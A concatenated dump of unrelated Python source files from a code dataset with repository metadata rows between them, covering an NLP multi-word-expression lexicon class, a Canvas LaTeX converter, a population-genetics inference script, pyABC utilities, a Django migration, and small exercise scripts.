potential_match = self.meta_data.get(mwe_mapped_template, None)
if potential_match is not None:
potential_match_type = potential_match.lexicon_type
if LexiconType.MWE_NON_SPECIAL == potential_match_type:
mwe_templates_matches.append(mwe_mapped_template)
requires_regular_expression_matching = False
if mwe_type == LexiconType.MWE_WILDCARD:
requires_regular_expression_matching = True
if not mwe_templates_matches and self.one_to_many_pos_tags:
requires_regular_expression_matching = True
if requires_regular_expression_matching:
n_gram_length = len(mwe_template.split())
mwe_template_length = len(mwe_template)
if mwe_template_length > 0:
for character_lookup in ['*', mwe_template[0]]:
regular_expression_lookup = self.pos_mapping_regular_expression_lookup[mwe_type][n_gram_length]
if character_lookup not in regular_expression_lookup:
continue
for (potential_mwe_match,
mwe_pattern) in regular_expression_lookup[character_lookup].items():
match = mwe_pattern.match(mwe_template)
if match is not None:
if (match.start() == 0
and match.end() == mwe_template_length):
mwe_templates_matches.append(potential_mwe_match)
else:
if mwe_type == LexiconType.MWE_NON_SPECIAL:
potential_match = self.meta_data.get(mwe_template, None)
if potential_match is not None:
potential_match_type = potential_match.lexicon_type
if LexiconType.MWE_NON_SPECIAL == potential_match_type:
mwe_templates_matches.append(mwe_template)
elif mwe_type == LexiconType.MWE_WILDCARD:
n_gram_length = len(mwe_template.split())
mwe_template_length = len(mwe_template)
if mwe_template_length > 0:
# By default all MWE matches can start with a * as it covers all characters.
for character_lookup in ['*', mwe_template[0]]:
regular_expression_lookup = self.mwe_regular_expression_lookup[n_gram_length]
if character_lookup not in regular_expression_lookup:
continue
for (potential_mwe_match,
mwe_pattern) in regular_expression_lookup[character_lookup].items():
match = mwe_pattern.match(mwe_template)
if match is not None:
if (match.start() == 0
and match.end() == mwe_template_length):
mwe_templates_matches.append(potential_mwe_match)
return mwe_templates_matches
def to_dictionary(self) -> Dict[str, List[str]]:
'''
Returns a dictionary of all MWE templates, the keys, stored in the
collection and their associated semantic tags, the values.
This can then be used to re-create a :class:`MWELexiconCollection`.
# Returns
`Dict[str, List[str]]`
# Examples
``` python
>>> from pymusas.lexicon_collection import (MWELexiconCollection,
... LexiconType, LexiconMetaData)
>>> mwe_collection = MWELexiconCollection()
>>> mwe_collection['*_noun boot*_noun'] = ['Z0', 'Z3']
>>> assert (mwe_collection['*_noun boot*_noun']
... == LexiconMetaData(['Z0', 'Z3'], 2, LexiconType.MWE_WILDCARD, 2))
>>> assert (mwe_collection.to_dictionary()
... == {'*_noun boot*_noun': ['Z0', 'Z3']})
```
'''
return {key: value.semantic_tags for key, value in self.items()}
def to_bytes(self) -> bytes:
'''
Serialises the :class:`MWELexiconCollection` to a bytestring.
# Returns
`bytes`
'''
serialise = {}
data: Dict[str, List[str]] = {key: value.semantic_tags
for key, value in self.meta_data.items()}
serialise['data'] = srsly.msgpack_dumps(data)
serialise['pos_mapper'] = srsly.msgpack_dumps(self.pos_mapper)
return cast(bytes, srsly.msgpack_dumps(serialise))
@staticmethod
def from_bytes(bytes_data: bytes) -> "MWELexiconCollection":
'''
Loads :class:`MWELexiconCollection` from the given bytestring and
returns it.
# Parameters
bytes_data : `bytes`
The bytestring to load.
# Returns
:class:`MWELexiconCollection`
'''
serialise_data = srsly.msgpack_loads(bytes_data)
data = srsly.msgpack_loads(serialise_data['data'])
pos_mapper = srsly.msgpack_loads(serialise_data['pos_mapper'])
return MWELexiconCollection(data, pos_mapper)
@staticmethod
def from_tsv(tsv_file_path: Union[PathLike, str]
) -> Dict[str, List[str]]:
'''
Given a `tsv_file_path` it will return a dictionary object
that can be used to create a :class:`MWELexiconCollection`.
Each line in the TSV file will be read in and added to a temporary
:class:`MWELexiconCollection`, once all lines
in the TSV have been parsed, the return value is the `data` attribute of
the temporary :class:`MWELexiconCollection`.
If the file path is a URL, the file will be downloaded and cached using
:func:`pymusas.file_utils.download_url_file`.
        Code reference: the identification of a URL and the idea to do this
        have come from the [AllenNLP library](https://github.com/allenai/allennlp/blob/main/allennlp/common/file_utils.py#L205)
# Parameters
tsv_file_path: `Union[PathLike, str]`
A file path or URL to a TSV file that contains at least these two
fields:
1. `mwe_template`,
2. `semantic_tags`
All other fields will be ignored.
# Returns
`Dict[str, List[str]]`
# Raises
`ValueError`
If the minimum field headings, `mwe_template` and `semantic_tags`,
do not exist in the given TSV file.
# Examples
``` python
>>> from pymusas.lexicon_collection import MWELexiconCollection
>>> portuguese_lexicon_url = 'https://raw.githubusercontent.com/UCREL/Multilingual-USAS/master/Portuguese/mwe-pt.tsv'
>>> mwe_lexicon_dict = MWELexiconCollection.from_tsv(portuguese_lexicon_url)
>>> mwe_lexicon_collection = MWELexiconCollection(mwe_lexicon_dict)
>>> assert mwe_lexicon_dict['abaixo_adv de_prep'][0] == 'M6'
>>> assert mwe_lexicon_dict['arco_noun e_conj flecha_noun'][0] == 'K5.1'
```
'''
minimum_field_names = {'mwe_template', 'semantic_tags'}
collection_from_tsv = MWELexiconCollection()
if not isinstance(tsv_file_path, str):
tsv_file_path = str(tsv_file_path)
parsed = urlparse(tsv_file_path)
if parsed.scheme in ("http", "https", "s3", "hf", "gs"):
tsv_file_path = file_utils.download_url_file(tsv_file_path)
with open(tsv_file_path, 'r', newline='', encoding='utf-8') as fp:
csv_reader = csv.DictReader(fp, delimiter='\t')
file_field_names: Set[str] = set()
if csv_reader.fieldnames:
file_field_names = set(csv_reader.fieldnames)
if not minimum_field_names.issubset(file_field_names):
error_msg = (f"The TSV file, {tsv_file_path}, given should "
"contain a header that"
" has at minimum the following fields "
f"{minimum_field_names}. The field names found "
f"were {file_field_names}")
raise ValueError(error_msg)
for row in csv_reader:
mwe_template = ''
semantic_tags: List[str] = []
for field_name in minimum_field_names:
if field_name == 'semantic_tags':
semantic_tags = row[field_name].split()
elif field_name == 'mwe_template':
mwe_template = row[field_name]
collection_from_tsv[mwe_template] = semantic_tags
return collection_from_tsv.to_dictionary()
@staticmethod
def escape_mwe(mwe_template: str) -> str:
r'''
Returns the MWE template escaped so that it can be used in a regular
expression.
The difference between this and the normal `re.escape`
method, is that we apply the `re.escape` method to the tokens in the
MWE template and then replace `\*` with `[^\s_]*` so that the wildcards
        keep their original meaning with respect to the MWE special syntax rules.
Furthermore, the POS tags in the MWE template replace the `*` with
`[^\s_]*`.
# Parameters
mwe_template : `str`
The MWE template that you want to escape, e.g.
`river_noun bank_noun` or `*_noun boot*_noun`
# Returns
`str`
# Examples
``` python
>>> from pymusas.lexicon_collection import MWELexiconCollection
>>> mwe_escaped = MWELexiconCollection.escape_mwe('ano*_prep carta_noun')
>>> assert r'ano[^\s_]*_prep\ carta_noun' == mwe_escaped
>>> mwe_escaped = MWELexiconCollection.escape_mwe('ano_prep carta_*')
>>> assert r'ano_prep\ carta_[^\s_]*' == mwe_escaped
```
'''
escaped_mwe_template_list: List[str] = []
for token, pos in utils.token_pos_tags_in_lexicon_entry(mwe_template):
escaped_token = re.escape(token).replace(r'\*', r'[^\s_]*')
escaped_pos = pos.replace(r'*', r'[^\s_]*')
escaped_mwe_template_list.append(f'{escaped_token}_{escaped_pos}')
escaped_mwe_template = r'\ '.join(escaped_mwe_template_list)
return escaped_mwe_template
def __setitem__(self, key: str, value: List[str]) -> None:
'''
# Raises
`ValueError`
            If using a `pos_mapper`, a POS tag within an MWE template cannot
            contain any wildcards unless the POS tag is only a wildcard; if
            this is not the case a `ValueError` will be raised.
'''
if '{' in key or '}' in key:
warnings.warn('We do not currently support Curly Braces expressions'
' within Multi Word Expression (MWE) lexicons and '
'therefore any MWE template that contains a `{` '
'or `}` will be ignored.')
return None
semantic_tags = value
key_n_gram_length = len(key.split())
mwe_type: LexiconType = LexiconType.MWE_NON_SPECIAL
wildcard_count = 0
if not self.pos_mapper:
if '*' in key:
mwe_type = LexiconType.MWE_WILDCARD
wildcard_count += key.count('*')
if wildcard_count > self.most_wildcards_in_mwe_template:
self.most_wildcards_in_mwe_template = wildcard_count
if key_n_gram_length > self.longest_wildcard_mwe_template:
self.longest_wildcard_mwe_template = key_n_gram_length
key_as_pattern = re.compile(self.escape_mwe(key))
self.mwe_regular_expression_lookup[key_n_gram_length][key[0]][key] = key_as_pattern
else:
if key_n_gram_length > self.longest_non_special_mwe_template:
self.longest_non_special_mwe_template = key_n_gram_length
else:
contains_one_to_many_pos_tag = False
pos_mapped_key_list: List[str] = []
for token, pos in utils.token_pos_tags_in_lexicon_entry(key):
if '*' in pos:
pos_error = ('When using a POS mapper a POS tag within '
'a lexicon entry cannot contain a wildcard'
' unless the POS tag is only a wildcard '
                                 'and no other characters. Lexicon entry '
'and POS tag in that entry that caused '
f'this error: {key} {pos}')
if set(pos.strip()) != set('*'):
raise ValueError(pos_error)
mapped_pos_list = self.pos_mapper.get(pos, [pos])
if len(mapped_pos_list) > 1:
contains_one_to_many_pos_tag = True
mapped_pos = '|'.join(mapped_pos_list)
mapped_pos = '(?:' + mapped_pos + ')'
pos_mapped_key_list.append(f'{token}_{mapped_pos}')
else:
mapped_pos = mapped_pos_list[0]
pos_mapped_key_list.append(f'{token}_{mapped_pos}')
pos_mapped_key = ' '.join(pos_mapped_key_list)
if '*' in pos_mapped_key:
mwe_type = LexiconType.MWE_WILDCARD
wildcard_count += key.count('*')
if wildcard_count > self.most_wildcards_in_mwe_template:
self.most_wildcards_in_mwe_template = wildcard_count
if key_n_gram_length > self.longest_wildcard_mwe_template:
self.longest_wildcard_mwe_template = key_n_gram_length
key_as_pattern = re.compile(self.escape_mwe(pos_mapped_key))
self.pos_mapping_regular_expression_lookup[mwe_type][key_n_gram_length][key[0]][key] = key_as_pattern
elif contains_one_to_many_pos_tag:
key_as_pattern = re.compile(self.escape_mwe(pos_mapped_key))
self.pos_mapping_regular_expression_lookup[mwe_type][key_n_gram_length][key[0]][key] = key_as_pattern
if key_n_gram_length > self.longest_non_special_mwe_template:
self.longest_non_special_mwe_template = key_n_gram_length
else:
self.pos_mapping_lookup[pos_mapped_key] = key
if key_n_gram_length > self.longest_non_special_mwe_template:
self.longest_non_special_mwe_template = key_n_gram_length
self.longest_mwe_template = max(self.longest_non_special_mwe_template,
self.longest_wildcard_mwe_template)
self.meta_data[key] = LexiconMetaData(semantic_tags, key_n_gram_length,
mwe_type, wildcard_count)
def __getitem__(self, key: str) -> LexiconMetaData:
return self.meta_data[key]
def __delitem__(self, key: str) -> None:
def _get_lexicon_statistics() -> Tuple[int, int, int]:
'''
Returns the `longest_non_special_mwe_template`,
`longest_wildcard_mwe_template`, and `most_wildcards_in_mwe_template`
in the `meta_data` as a `Tuple`. This is required as after deleting
an MWE we do not know if it has affected any of these statistics.
# Returns
`Tuple[int, int, int]`
'''
longest_non_special_mwe_template = 0
longest_wildcard_mwe_template = 0
wildcard_count = 0
for value in self.values():
mwe_type = value.lexicon_type
key_n_gram_length = value.n_gram_length
if mwe_type == LexiconType.MWE_NON_SPECIAL:
if key_n_gram_length > longest_non_special_mwe_template:
longest_non_special_mwe_template = key_n_gram_length
elif mwe_type == LexiconType.MWE_WILDCARD:
if key_n_gram_length > longest_wildcard_mwe_template:
longest_wildcard_mwe_template = key_n_gram_length
if value.wildcard_count > wildcard_count:
wildcard_count = value.wildcard_count
return (longest_non_special_mwe_template,
longest_wildcard_mwe_template,
wildcard_count)
lexicon_meta_data = self[key]
del self.meta_data[key]
lexicon_type = lexicon_meta_data.lexicon_type
n_gram_length = lexicon_meta_data.n_gram_length
if self.pos_mapper:
if lexicon_type == LexiconType.MWE_WILDCARD:
del self.pos_mapping_regular_expression_lookup[lexicon_type][n_gram_length][key[0]][key]
if lexicon_type == LexiconType.MWE_NON_SPECIAL:
unique_pos_tags_in_key = utils.unique_pos_tags_in_lexicon_entry(key)
if self.one_to_many_pos_tags.intersection(unique_pos_tags_in_key):
del self.pos_mapping_regular_expression_lookup[lexicon_type][n_gram_length][key[0]][key]
else:
_key_to_delete = ''
for _key, value in self.pos_mapping_lookup.items():
if value == key:
_key_to_delete = _key
if _key_to_delete:
del self.pos_mapping_lookup[_key_to_delete]
else:
if lexicon_type == LexiconType.MWE_WILDCARD:
del self.mwe_regular_expression_lookup[n_gram_length][key[0]][key]
(self.longest_non_special_mwe_template,
self.longest_wildcard_mwe_template,
self.most_wildcards_in_mwe_template) = _get_lexicon_statistics()
self.longest_mwe_template = max(self.longest_non_special_mwe_template,
self.longest_wildcard_mwe_template)
def __len__(self) -> int:
return len(self.meta_data)
def __iter__(self) -> Generator[str, None, None]:
for key in self.meta_data:
yield key
def __str__(self) -> str:
'''
Human readable string.
'''
object_str = f'{self.__class__.__name__}('
for index, item in enumerate(self.items()):
mwe_template = item[0]
meta_data = item[1]
object_str += f"('{mwe_template}': {meta_data}), "
if index == 1:
object_str += '... '
break
        object_str += f') ({len(self)} entries in the collection)'
if self.pos_mapper:
object_str += ' (Using a POS Mapper)'
return object_str
def __repr__(self) -> str:
'''
Machine readable string. When printed and run `eval()` over the string
you should be able to recreate the object.
'''
return (f'{self.__class__.__name__}(data={self.to_dictionary()}, '
f'pos_mapper={self.pos_mapper})')
def __eq__(self, other: object) -> bool:
'''
Given another object to compare too it will return `True` if the other
object is the same class and contains the same `meta_data` and
`pos_mapper` instance attributes.
# Parameters
other : `object`
The object to compare too.
# Returns
`True`
'''
if not isinstance(other, MWELexiconCollection):
return False
if len(self) != len(other):
return False
if self.pos_mapper != other.pos_mapper:
return False
if self.meta_data != other.meta_data:
return False
return True
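# Minimal sanity check when run directly. This is illustrative only and simply
# mirrors the doctest examples embedded in the class docstrings above.
if __name__ == '__main__':
    single_collection = LexiconCollection()
    single_collection.add_lexicon_entry(LexiconEntry('London', ['Z3', 'Z1', 'A1'], 'noun'))
    assert single_collection['London|noun'][0] == 'Z3'
    mwe_collection = MWELexiconCollection({'ski_noun boot_noun': ['Z2'],
                                           '*_noun boot_noun': ['Z2']})
    assert (mwe_collection.mwe_match('ski_noun boot_noun', LexiconType.MWE_NON_SPECIAL)
            == ['ski_noun boot_noun'])
    assert (mwe_collection.mwe_match('ski_noun boot_noun', LexiconType.MWE_WILDCARD)
            == ['*_noun boot_noun'])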
| [
"[email protected]"
] | |
d5d60ae5edaf5a5eb22194b2a9d172139d102b63 | ad0567e70e3c448955b25aa4a6d8e6e30027b7b1 | /scripts/canvastex.py | daf2b04f6d00eb6f03af3a5d6f25677f13d8f9b7 | [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | dsavransky/grading | 8409f800335296cd15f604c7f5af86cd0c25a31d | 5925cbdcf82b1eed90c927a35c2bc1bf6de13fae | refs/heads/main | 2022-08-12T22:52:34.076808 | 2022-07-22T15:27:15 | 2022-07-22T15:27:15 | 209,359,426 | 8 | 4 | MIT | 2021-10-06T12:57:03 | 2019-09-18T16:50:15 | Python | UTF-8 | Python | false | false | 1,236 | py | #!python
import argparse
import urllib.parse
import re
import os.path
def convlatex(texstr):
""" Convert input latex string to Canvas's img html """
if isinstance(texstr, re.Match):
texstr = texstr.groups()[0]
qtxt = """<img class="equation_image" title="{0}" src="https://canvas.cornell.edu/equation_images/{1}" alt="LaTeX: {0}">""".format(
texstr, urllib.parse.quote(urllib.parse.quote(texstr))
)
return qtxt
def convall(text):
p = re.compile(r"\${1,2}(.*?)\${1,2}")
return p.sub(convlatex, text)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Convert LaTeX input to Canvas-style html."
)
parser.add_argument(
"texstr", nargs=1, type=str, help="LaTeX input or file (string)."
)
parser.add_argument(
"--par",
action="store_true",
help="Treat input as paragraph with embedded LaTeX with $ or $$ delimiters",
)
args = parser.parse_args()
texstr = args.texstr[0]
if os.path.exists(texstr):
with open(texstr, "r") as f:
texstr = f.read()
if args.par:
qtxt = convall(texstr)
else:
qtxt = convlatex(texstr)
print(qtxt)
exit(0)
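# Example invocations (illustrative):
#   python canvastex.py 'x^2 + y^2'
#   python canvastex.py --par 'Pythagoras: $x^2 + y^2 = z^2$ holds.'
# Both print Canvas-style <img class="equation_image" ...> HTML, with the LaTeX
# double-URL-encoded into the equation_images path as done in convlatex() above.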
| [
"[email protected]"
] | |
5588bd437577ce0e40d6e6d5de7128a2ee7fca69 | 925f2935b34042abc9161795413031ae68f45b9a | /multimodel_inference/SC3elsm.py | 859de2c0b23b9b122810c0220fa1cecd7c1363ea | [] | no_license | Farhad63/AFS-analysis-with-moments | 7e1d17f47c06ed97ebb7c9ec8245fe52a88622c3 | 7874b1085073e5f62d910ef2d79a22b29ff3be84 | refs/heads/master | 2022-04-09T22:11:12.341235 | 2020-03-11T21:15:42 | 2020-03-11T21:15:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,429 | py | #!/usr/bin/env python
# split, three epochs in each pop, asymmetric migration at same rates in all epochs
# n(para): 11
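# Parameter key, read from the sc3ei() signature below (for quick reference):
#   nu1_1,nu2_1 / nu1_2,nu2_2 / nu1_3,nu2_3 - sizes of pop1 and pop2 in epochs
#   1-3 (relative to the ancestral population); T1,T2,T3 - epoch durations;
#   m - migration rate, applied in epochs 1 and 3 (no migration in epoch 2);
#   p_misid - proportion of misidentified ancestral states.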
import matplotlib
matplotlib.use('PDF')
import moments
import pylab
import random
import matplotlib.pyplot as plt
import numpy as np
from numpy import array
from moments import Misc,Spectrum,Numerics,Manips,Integration,Demographics1D,Demographics2D
import sys
infile=sys.argv[1]
pop_ids=[sys.argv[2],sys.argv[3]]
projections=[int(sys.argv[4]),int(sys.argv[5])]
#params=[float(sys.argv[6]),float(sys.argv[7]),float(sys.argv[8]),float(sys.argv[9]),float(sys.argv[10]),float(sys.argv[11])]
params=[1,1,1,1,1,1,1,1,1,1,0.01]
# mutation rate per sequenced portion of genome per generation: for A.millepora, 0.02
mu=float(sys.argv[6])
# generation time, in thousand years: 0.005 (5 years)
gtime=float(sys.argv[7])
dd = Misc.make_data_dict(infile)
# set Polarized=False below for folded AFS analysis
data = Spectrum.from_data_dict(dd, pop_ids,projections,polarized=True)
ns=data.sample_sizes
np.set_printoptions(precision=3)
#-------------------
# split into unequal pop sizes with asymmetrical migration
def sc3ei(params , ns):
# p_misid: proportion of misidentified ancestral states
nu1_1, nu2_1, nu1_2,nu2_2,nu1_3,nu2_3,T1, T2, T3,m, p_misid = params
sts = moments.LinearSystem_1D.steady_state_1D(ns[0] + ns[1])
fs = moments.Spectrum(sts)
fs = moments.Manips.split_1D_to_2D(fs, ns[0], ns[1])
fs.integrate([nu1_1, nu2_1], T1, m = np.array([[0, m], [m, 0]]))
fs.integrate([nu1_2, nu2_2], T2, m = np.array([[0, 0], [0, 0]]))
fs.integrate([nu1_3, nu2_3], T3, m = np.array([[0, m], [m, 0]]))
return (1-p_misid)*fs + p_misid*moments.Numerics.reverse_array(fs)
func=sc3ei
upper_bound = [100, 100, 100,100,100, 100, 100, 100,100, 200,0.25]
lower_bound = [1e-3,1e-3, 1e-3,1e-3,1e-3,1e-3,1e-3,1e-3,1e-3,1e-5,1e-5]
params = moments.Misc.perturb_params(params, fold=2, upper_bound=upper_bound,
lower_bound=lower_bound)
poptg = moments.Inference.optimize_log(params, data, func,
lower_bound=lower_bound,
upper_bound=upper_bound,
verbose=False, maxiter=30)
# extracting model predictions, likelihood and theta
model = func(poptg, ns)
ll_model = moments.Inference.ll_multinom(model, data)
theta = moments.Inference.optimal_sfs_scaling(model, data)
# random index for this replicate
ind=str(random.randint(0,999999))
# plotting demographic model
plot_mod = moments.ModelPlot.generate_model(func, poptg, ns)
moments.ModelPlot.plot_model(plot_mod, save_file="sc3elsm_"+ind+".png", pop_labels=pop_ids, nref=theta/(4*mu), draw_scale=False, gen_time=gtime, gen_time_units="KY", reverse_timeline=True)
# bootstrapping for SDs of params and theta
all_boot=moments.Misc.bootstrap(dd,pop_ids,projections)
uncert=moments.Godambe.GIM_uncert(func,all_boot,poptg,data)
# printing parameters and their SDs
print "RESULT","sc3elsm",ind,len(params),ll_model,sys.argv[1],sys.argv[2],sys.argv[3],poptg,theta,uncert
# plotting quad-panel figure with AFS, model, residuals:
moments.Plotting.plot_2d_comp_multinom(model, data, vmin=1, resid_range=3,
pop_ids =pop_ids)
plt.savefig("sc3elsm_"+ind+"_"+sys.argv[1]+"_"+sys.argv[2]+"_"+sys.argv[3]+"_"+sys.argv[4]+"_"+sys.argv[5]+'.pdf')
| [
"[email protected]"
] | |
370cd35756182e41352487f83230411fd0926a55 | 7c8fd5af8ade349f1d9f59c40cf9d5cda2755814 | /calculator.py | 80b33d64a550e7940ce55a1ef43fa6d6fb5af57d | [] | no_license | emilydowgialo/calculator-2 | 47cf6c31889ea56847e84b58f8e6c70f4336084f | 393aca0b3018192ecc3db68ff59a183438485e9e | refs/heads/master | 2016-08-11T07:48:06.250197 | 2016-04-07T19:59:55 | 2016-04-07T19:59:55 | 55,652,660 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,431 | py | """
calculator.py
Using our arithmetic.py file from Exercise02, create the
calculator program yourself in this file.
"""
from arithmetic import *
# Your code goes here
def calc_function():
    value_returned = False
    calculating = True
    while calculating:
        while not value_returned:
            user_input = raw_input("> ")  # renamed from 'input', which shadowed a builtin
            tokens = user_input.split(" ")  # parsing user's input by space
            token_list = [int(token) for token in tokens[1:]]  # all operands as integers
            num1 = token_list[0]  # first operand
            num2 = token_list[1] if len(token_list) > 1 else None  # second operand, if given
            if tokens[0] == "+":  # add function
                print add(token_list)  # add() is assumed to take the whole operand list, per the original call
                value_returned = True  # breaking the loop
            elif tokens[0] == "-":  # subtract function
                print subtract(num1, num2)  # calling the subtract function from arithmetic.py module
                value_returned = True
            elif tokens[0] == "*":  # multiply function
                print multiply(num1, num2)
                value_returned = True
            elif tokens[0] == "/":  # divide function
                print divide(num1, num2)
                value_returned = True
            elif tokens[0] == "square":
                print square(num1)
                value_returned = True
            elif tokens[0] == "cube":
                print cube(num1)
                value_returned = True
            elif tokens[0] == "pow":
                print power(num1, num2)
                value_returned = True
            elif tokens[0] == "mod":
                print mod(num1, num2)
                value_returned = True
            continue_playing = raw_input("Would you like to continue calculating? Type 1 for yes and type 2 for no: ")
            if continue_playing == "1":
                value_returned = False
            elif continue_playing == "2":
                calculating = False
                print "goodbye"
            else:
                print "Error: you did not type 1 or 2!"
calc_function()
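# Example session (illustrative; assumes arithmetic.py defines add() over a
# list plus two-argument subtract/multiply/divide/power/mod and one-argument
# square/cube):
#   > + 2 3 4
#   9
#   > square 5
#   25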
| [
"[email protected]"
] | |
89b03a17f56e9843db582338bc395c1f2fea79cf | 9724c8cd81ad39f7f9a2419e2873d7d74cb10c72 | /pyabc/util/dict2arr.py | 1e205cc289c9abf58cf89c4e2a29997249c9bcd2 | [
"BSD-3-Clause"
] | permissive | ICB-DCM/pyABC | 36b7fc431fe4ba4b34d80d268603ec410aeaf918 | d1542fb201edca86369082e1fc7934995e3d03a4 | refs/heads/main | 2023-09-01T13:42:52.880878 | 2023-08-18T16:55:04 | 2023-08-18T16:55:04 | 96,995,608 | 187 | 49 | BSD-3-Clause | 2023-08-18T16:55:05 | 2017-07-12T10:30:10 | Python | UTF-8 | Python | false | false | 2,995 | py | """Transform dictionaries to arrays."""
from numbers import Number
from typing import List, Union
import numpy as np
import pandas as pd
def dict2arr(dct: Union[dict, np.ndarray], keys: List) -> np.ndarray:
"""Convert dictionary to 1d array, in specified key order.
Parameters
----------
    dct: If dict-like, values of all keys are extracted into a 1d array.
Entries can be data frames, ndarrays, or single numbers.
keys: Keys of interest, also defines the order.
Returns
-------
arr: 1d array of all concatenated values.
"""
if isinstance(dct, np.ndarray):
return dct
arr = []
for key in keys:
val = dct[key]
if isinstance(val, (pd.DataFrame, pd.Series)):
arr.append(val.to_numpy().flatten())
elif isinstance(val, np.ndarray):
arr.append(val.flatten())
elif isinstance(val, Number):
arr.append([val])
else:
raise TypeError(
f"Cannot parse variable {key}={val} of type {type(val)} "
"to numeric."
)
# for efficiency, directly parse single entries
if len(arr) == 1:
return np.asarray(arr[0])
# flatten
arr = [val for sub_arr in arr for val in sub_arr]
return np.asarray(arr)
def dict2arrlabels(dct: dict, keys: List) -> List[str]:
"""Get label array consistent with the output of `dict2arr`.
Can be called e.g. once on the observed data and used for logging.
Parameters
----------
dct: Model output or observed data.
keys: Keys of interest, also defines the order.
Returns
-------
labels: List of labels consistent with the output of `dict2arr`.
"""
labels = []
for key in keys:
val = dct[key]
if isinstance(val, (pd.DataFrame, pd.Series)):
# default flattening mode is 'C', i.e. row-major, i.e. row-by-row
for row in range(len(val.index)):
for col in val.columns:
labels.append(f"{key}:{col}:{row}")
elif isinstance(val, np.ndarray):
# array can have any dimension, thus just flat indices
for ix in range(val.size):
labels.append(f"{key}:{ix}")
elif isinstance(val, Number):
labels.append(key)
else:
raise TypeError(
f"Cannot parse variable {key}={val} of type {type(val)} "
"to numeric."
)
return labels
def io_dict2arr(fun):
"""Wrapper parsing inputs dicts to ndarrays.
Assumes the array is the first argument, and `self` holds a `keys`
variable.
"""
def wrapped_fun(self, data: Union[dict, np.ndarray], *args, **kwargs):
# convert input to array
data = dict2arr(data, self.x_keys)
# call the actual function
ret: np.ndarray = fun(self, data, *args, **kwargs)
# flatten output
return ret.flatten()
return wrapped_fun
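# Hedged usage sketch (added; not part of the original module):
#
#     dct = {"a": np.array([[1, 2]]), "b": 3.0}
#     dict2arr(dct, ["a", "b"])        # -> array([1., 2., 3.])
#     dict2arrlabels(dct, ["a", "b"])  # -> ['a:0', 'a:1', 'b']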
| [
"[email protected]"
] | |
0e88de598b1ad3a47bce2fd27367d2c995ed185d | 487ce91881032c1de16e35ed8bc187d6034205f7 | /codes/CodeJamCrawler/16_0_2_neat/16_0_2_mck_B.py | 357542136cb2949d40fc809ea50ad4ecaec00794 | [] | no_license | DaHuO/Supergraph | 9cd26d8c5a081803015d93cf5f2674009e92ef7e | c88059dc66297af577ad2b8afa4e0ac0ad622915 | refs/heads/master | 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 | Python | UTF-8 | Python | false | false | 576 | py | import sys
def flip(x, list):
    # flip the signs of the stack prefix ending at index x (inclusive)
    for i in range(0, x + 1):
if list[i] == "-":
list[i] = "+"
else:
list[i] = "-"
return list
def getLastIndexOfN(list):
    # return the index of the last '-' (blank-side-up) pancake, or -1 if none
    for i in range(len(list), 0, -1):
if list[i - 1] == "-":
return i - 1
return -1
if __name__ == "__main__":
tests = int(sys.stdin.readline())
for test in range(1, tests + 1):
s = sys.stdin.readline().replace("\n", "")
s = [i for i in s]
ans = 0
while "-" in s:
ans += 1
s = flip(getLastIndexOfN(s), s)
print ("Case #" + str(test) + ": " + str(ans))
| [
"[[email protected]]"
] | |
aea17cef7dbd0f04529c1d5463ea0f6bfcb948fc | af9268e1ead8cdb491868c14a2240d9e44fb3b56 | /Cousinade/polls/migrations/0001_initial.py | 6363a01cf03b7608b2f3dd7940be9dd6cb4cd7dd | [] | no_license | frosqh/Cousinade2017 | d5154c24c93ca8089eeba26b53c594e92cb6bd82 | c34d5707af02402bf2bb7405eddc91297da399ff | refs/heads/master | 2021-01-20T07:57:34.586476 | 2017-10-22T18:42:45 | 2017-10-22T18:42:45 | 90,074,802 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,053 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-10-15 23:15
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import polls.models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Author',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('authorName', models.CharField(default='anonymous', max_length=200)),
],
),
migrations.CreateModel(
name='Photos',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('photo', models.ImageField(upload_to=polls.models.user_directory_path)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='polls.Author')),
],
),
]
| [
"[email protected]"
] | |
17d3ff2a36f1adcf56dde4f95f0754a323175ca0 | eb736f1412e434522687190685ccdae9ba722b58 | /Lab Exercise 2.3.2021/Cars/cars2.py | 2f49598a60b1672ee3390830cbfe517e22323420 | [] | no_license | nmessa/C_Sharp-2021 | 4a008853f4cf9fa8a617a5fcadaad964fc30c84c | 1124d4ab106a6a2204b98019b36f495f4167a12b | refs/heads/main | 2023-06-05T15:35:13.734371 | 2021-06-15T12:43:02 | 2021-06-15T12:43:02 | 332,059,776 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 961 | py | #Closest approach of 2 cars
##Car1 traveling north currently 2 miles south of junction at a rate of 30 MPH
##Car2 traveling west currently 3 miles east of jucntion at a rate of 40 MPH
##Find the closest distance the two cars approach
from math import *
from pylab import *
import time
collisions = []
for speed1 in range(1, 50):
for speed2 in range(1,50):
times = []
distances = []
t = 0
while True:
car1 = 2 - speed1/3600 * t
car2 = 3 - speed2/3600 * t
distance = sqrt(car1**2 + car2**2)
if car1 < 0 and car2 < 0:
break
distances.append(distance)
times.append(t)
t += 1
            if distance < 0.01:
                collisions.append((speed1, speed2))
                break  # record each near-collision speed pair at most once
## plot(times, distances)
## grid(True)
## show()
print(collisions)
##Solution
##0.2 miles at time 259 seconds
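##Closed-form check (added sketch): with car1 = 2 - v1*t and car2 = 3 - v2*t
##(t in hours), d(t)^2 = (2 - v1*t)^2 + (3 - v2*t)^2 is minimized at
##t* = (2*v1 + 3*v2)/(v1^2 + v2^2), giving d_min = |2*v2 - 3*v1|/sqrt(v1^2 + v2^2).
##For v1 = 30 and v2 = 40: t* = 180/2500 h = 259.2 s, d_min = 10/50 = 0.2 miles,
##matching the solution above.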
| [
"[email protected]"
] | |
